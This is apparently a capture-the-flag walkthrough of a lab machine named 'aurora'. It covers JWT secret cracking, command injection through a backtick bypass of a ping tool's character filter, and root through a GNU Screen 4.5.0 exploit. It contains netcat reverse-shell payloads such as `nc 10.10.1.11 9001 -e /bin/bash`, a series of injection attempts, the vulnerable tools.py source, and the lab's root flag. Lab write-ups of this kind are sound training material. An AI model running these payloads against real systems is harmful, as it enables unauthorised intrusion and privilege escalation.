nmap -sCV -O -p- -oA auroraSCAN -vvv 10.10.1.16
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
3000/tcp open http syn-ack ttl 64 Node.js Express framework
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Error
MAC Address: 08:00:27:1A:8B:0C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
3000/tcp HTTP
We know from nmap that this is a Node.js Express framework, but we could have also known by viewing the source of the page.
We can't use the GET method for the root directory, but can we use it for others?
Login needs credentials, so we need to register first
Bad Request for the "role" field
Did a couple of tries to register and then searched for Node.js applications on how the register page was developed, and this medium writer even added how the request should be
Now we know the secret, but it seems like JWT.io has new standards in encoding, so I will use another site
We have an access token as an admin. But what is it for? We only had register and login. I'm using dirsearch for quick hits, but for more control, I'll use ffuf. The difference between these types of tools is how much you can control the request, speed, and ux.
I used a different wordlist here and didn't get the register page, but got a new page, "execute"
This tools.py is pinging the IP I give to it. So let's try command injection
www-data@aurora:/home/doro$ ls -la
total 36
drwxr-xr-x 4 doro doro 4096 Mar 8 2023 .
drwxr-xr-x 3 root root 4096 Mar 6 2023 ..
lrwxrwxrwx 1 root root 9 Mar 3 2023 .bash_history -> /dev/null
-rw-r--r-- 1 doro doro 220 Mar 3 2023 .bash_logout
-rw-r--r-- 1 doro doro 3526 Mar 3 2023 .bashrc
drwxr-xr-x 3 doro doro 4096 Mar 4 2023 .local
-rw-r--r-- 1 doro doro 807 Mar 3 2023 .profile
drwx------ 2 doro doro 4096 Mar 4 2023 .ssh
-rw-r--r-- 1 root root 1380 Mar 7 2023 tools.py
-rwx------ 1 doro doro 33 Mar 3 2023 user.txt
www-data@aurora:/home/doro$ sudo -u doro /usr/bin/python3 /home/doro/tools.py --ping
Enter an IP address: 10.10.1.16
PING 10.10.1.16 (10.10.1.16) 56(84) bytes of data.
64 bytes from 10.10.1.16: icmp_seq=1 ttl=64 time=0.065 ms
64 bytes from 10.10.1.16: icmp_seq=2 ttl=64 time=0.028 ms
--- 10.10.1.16 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1015ms
rtt min/avg/max/mdev = 0.028/0.046/0.065/0.018 ms
we can't use ';'
www-data@aurora:/home/doro$ sudo -u doro /usr/bin/python3 /home/doro/tools.py --ping
Enter an IP address: 1;nc 10.10.1.11 9001 -e /bin/bash
Forbidden character found: ;
Tried some of the injections i know and yeah we found that the backticks works `
www-data@aurora:/home/doro$ sudo -u doro /usr/bin/python3 /home/doro/tools.py --ping
Enter an IP address: 1\nid
ping: 1nid: Temporary failure in name resolution
www-data@aurora:/home/doro$ sudo -u doro /usr/bin/python3 /home/doro/tools.py --ping
Enter an IP address: 10.10.1.16\nid
ping: 10.10.1.16nid: Temporary failure in name resolution
www-data@aurora:/home/doro$ sudo -u doro /usr/bin/python3 /home/doro/tools.py --ping
Enter an IP address: 10.10.1.16&id
Forbidden character found: &
www-data@aurora:/home/doro$ sudo -u doro /usr/bin/python3 /home/doro/tools.py --ping
Enter an IP address: 10.10.1.16|id
Forbidden character found: |
www-data@aurora:/home/doro$ sudo -u doro /usr/bin/python3 /home/doro/tools.py --ping
Enter an IP address: 10.10.1.16&&id
Forbidden character found: &
www-data@aurora:/home/doro$ sudo -u doro /usr/bin/python3 /home/doro/tools.py --ping
Enter an IP address: 10.10.1.16||id
Forbidden character found: ||
www-data@aurora:/home/doro$ sudo -u doro /usr/bin/python3 /home/doro/tools.py --ping
Enter an IP address: 10.10.1.16$()id
Forbidden character found: (
www-data@aurora:/home/doro$ sudo -u doro /usr/bin/python3 /home/doro/tools.py --ping
Enter an IP address: 10.10.1.16``id
ping: 10.10.1.16id: Temporary failure in name resolution
Shell as doro
Let's get a shell as Doro
nc -nvlp 9001
www-data@aurora:~$ sudo -u doro /usr/bin/python3 /home/doro/tools.py --ping
Enter an IP address: `nc 10.10.1.11 9001 -e /bin/bash`
Upgrade TTY
nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.10.1.11] from (UNKNOWN) [10.10.1.16] 59682
python3 -c 'import pty; pty.spawn("/bin/bash")'
doro@aurora:/opt/login-app$ ^Z
[1] + 2455 suspended nc -nvlp 9001
➜ aurora stty raw -echo;fg
[1] + 2455 continued nc -nvlp 9001
export SHELL=bash
doro@aurora:/opt/login-app$ export TERM=xterm-256color
doro@aurora:/opt/login-app$ stty rows 53 columns 236
doro@aurora:/opt/login-app$ cd ~
doro@aurora:~$ ls -la
total 36
drwxr-xr-x 4 doro doro 4096 Mar 8 2023 .
drwxr-xr-x 3 root root 4096 Mar 6 2023 ..
lrwxrwxrwx 1 root root 9 Mar 3 2023 .bash_history -> /dev/null
-rw-r--r-- 1 doro doro 220 Mar 3 2023 .bash_logout
-rw-r--r-- 1 doro doro 3526 Mar 3 2023 .bashrc
drwxr-xr-x 3 doro doro 4096 Mar 4 2023 .local
-rw-r--r-- 1 doro doro 807 Mar 3 2023 .profile
drwx------ 2 doro doro 4096 Mar 4 2023 .ssh
-rw-r--r-- 1 root root 1380 Mar 7 2023 tools.py
-rwx------ 1 doro doro 33 Mar 3 2023 user.txt
python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
strace Not Found
-rwsr-xr-- 1 root messagebus 51K Oct 5 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 471K Jul 2 2022 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 55K Jan 20 2022 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 63K Feb 7 2020 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 58K Feb 7 2020 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 71K Jan 20 2022 /usr/bin/su
-rwsr-xr-x 1 root root 52K Feb 7 2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 44K Feb 7 2020 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 87K Feb 7 2020 /usr/bin/gpasswd
-rwsr-sr-x+ 1 root root 1.8M Mar 3 2023 /usr/bin/screen ---> GNU_Screen_4.5.0
-rwsr-xr-x 1 root root 179K Jan 14 2023 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 35K Jan 20 2022 /usr/bin/umount ---> BSD/Linux(08-1996)
╔══════════╣ SGID
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
-rwxr-sr-x 1 root crontab 43K Feb 22 2021 /usr/bin/crontab
-rwxr-sr-x 1 root ssh 347K Jul 2 2022 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 35K Jan 20 2022 /usr/bin/wall
-rwxr-sr-x 1 root tty 23K Jan 20 2022 /usr/bin/write.ul (Unknown SGID binary)
-rwxr-sr-x 1 root shadow 31K Feb 7 2020 /usr/bin/expiry
-rwxr-sr-x 1 root shadow 79K Feb 7 2020 /usr/bin/chage
-rwsr-sr-x+ 1 root root 1.8M Mar 3 2023 /usr/bin/screen ---> GNU_Screen_4.5.0
-rwxr-sr-x 1 root mail 23K Feb 4 2021 /usr/bin/dotlockfile
-rwxr-sr-x 1 root shadow 38K Aug 26 2021 /usr/sbin/unix_chkpwd
Here we have mount, passwd, chfn, newgrp, screen, sudo (not certainly), unmount, and write.ul (Unknown).
What I do here is take each binary and see if GTFObins has any exploits for it. I will start with screen since we have it in both
Nothing interesting about it. Maybe the version has an exploit?
searchsploit GNU screen 4.5.0
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
GNU Screen 4.5.0 - Local Privilege Escalation | linux/local/41154.sh
GNU Screen 4.5.0 - Local Privilege Escalation (PoC) | linux/local/41152.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
doro@aurora:~$ ./41154.sh
~ gnu/screenroot ~
[+] First, we create our shell and library...
/tmp/libhax.c: In function ‘dropshell’:
/tmp/libhax.c:7:5: warning: implicit declaration of function ‘chmod’ [-Wimplicit-function-declaration]
7 | chmod("/tmp/rootshell", 04755);
| ^~~~~
/tmp/rootshell.c: In function ‘main’:
/tmp/rootshell.c:3:5: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
3 | setuid(0);
| ^~~~~~
/tmp/rootshell.c:4:5: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
4 | setgid(0);
| ^~~~~~
/tmp/rootshell.c:5:5: warning: implicit declaration of function ‘seteuid’ [-Wimplicit-function-declaration]
5 | seteuid(0);
| ^~~~~~~
/tmp/rootshell.c:6:5: warning: implicit declaration of function ‘setegid’ [-Wimplicit-function-declaration]
6 | setegid(0);
| ^~~~~~~
/tmp/rootshell.c:7:5: warning: implicit declaration of function ‘execvp’ [-Wimplicit-function-declaration]
7 | execvp("/bin/sh", NULL, NULL);
| ^~~~~~
/tmp/rootshell.c:7:5: warning: too many arguments to built-in function ‘execvp’ expecting 2 [-Wbuiltin-declaration-mismatch]
/usr/bin/ld: cannot open output file /tmp/rootshell: Permission denied
collect2: error: ld returned 1 exit status
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-doro.
# id
uid=0(root) gid=0(root) groups=0(root),1000(doro)
# cd /root
# ls
root.txt
# cat root.txt
052cf26a6e7e33790391c0d869e2e40c
Beyond root
tools.py has protection for command injection, but it doesn't have a filter for backticks, which is why it worked.
tools.py
import os
import sys
def main():
if len(sys.argv) < 2:
print_help()
return
option = sys.argv[1]
if option == "--ping":
ping()
elif option == "--traceroute":
traceroute_ip()
else:
print("Invalid option.")
print_help()
def print_help():
print("Usage: python3 network_tool.py <option>")
print("Options:")
print("--ping Ping an IP address")
print("--traceroute Perform a traceroute on an IP address")
def ping():
ip_address = input("Enter an IP address: ")
forbidden_chars = ["&", ";", "(", ")", "||", "|", ">", "<", "*", "?"]
for char in forbidden_chars:
if char in ip_address:
print("Forbidden character found: {}".format(char))
sys.exit(1)
os.system('ping -c 2 ' + ip_address)
def traceroute_ip():
ip_address = input("Enter an IP address: ")
if not is_valid_ip(ip_address):
print("Invalid IP address.")
return
traceroute_command = "traceroute {}".format(ip_address)
os.system(traceroute_command)
def is_valid_ip(ip_address):
octets = ip_address.split(".")
if len(octets) != 4:
return False
for octet in octets:
if not octet.isdigit() or int(octet) < 0 or int(octet) > 255:
return False
return True
if __name__ == "__main__":
main()
After a couple of steps knew how to register. And in the end got a JWT token, which I had experience with before in on HTB.
We need to crack it. I will use hashcat since it can run on Windows and use my GPU, which will take less time than the VM.
If you want to know the module number, view . You can pass the first couple of characters or search JWT, and it will pop up immediately
From here, we can continue some manual enumeration or use any of the automated privilege escalation tools. I will use .
Now, set up a web server to transfer it to the machine
One of the things I love to start with, if no RED/YELLOW hit is the SUID and SGID because you can run those as root. []
Backticks are used for command substitution. which means the shell will execute the command inside the backticks and replace it with its output. []
